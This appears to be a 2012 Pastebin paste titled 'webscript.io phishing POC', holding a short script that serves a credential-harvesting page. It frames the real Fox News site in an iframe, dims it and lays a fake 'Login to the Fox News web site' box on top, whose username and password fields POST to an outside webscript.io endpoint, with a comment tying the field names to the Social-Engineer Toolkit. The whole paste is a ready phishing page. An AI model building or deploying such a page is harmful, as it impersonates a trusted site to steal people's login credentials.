Advertisement
Guest User

webscript.io phishing POC

a guest
Nov 3rd, 2012
80
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.14 KB | None | 0 0
  1. return [[<iframe src="http://www.foxnews.com/" style=" margin: 0px; padding: 0px; width: 100%; height: 2000px;" ></iframe>
  2.  
  3. <!-- Add the background to give the popup effect -->
  4. <div id="bg" style="background-color: #111111; opacity: 0.65; filter: alpha(opacity=65); position: absolute; z-index: 9000; top: 0px; left: 0px; width: 100%; height: 2000px;"></div>
  5.  
  6. <!-- Create the login box -->
  7. <div id="login" style="padding: 16px; position: absolute; top: 40px; left: 40px; background-color: #eeeeee; width: 300px; z-index: 10000; text-align: left; border: 2px solid #000000;">
  8. <p>Login to the Fox News web site.</p>
  9.  
  10. <!-- The action on the form is not important, but the method should be POST -->
  11. <form action="http://foxnews.webscript.io/data" method="POST">
  12. <table border="0" cellpadding="1" cellspacing="1">
  13.  
  14. <!-- SET wants inputs named username and password -->
  15. <tr><td>Username: </td><td><input type="text" name="username" /></td></tr>
  16. <tr><td>Password: </td><td><input type="password" name="password" /></td></tr>
  17. <tr><td colspan="2"><input type="submit" value="Login" /></td></tr>
  18. </table>
  19. </form>
  20. </div>]], {["Content-Type"]="text/html"}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement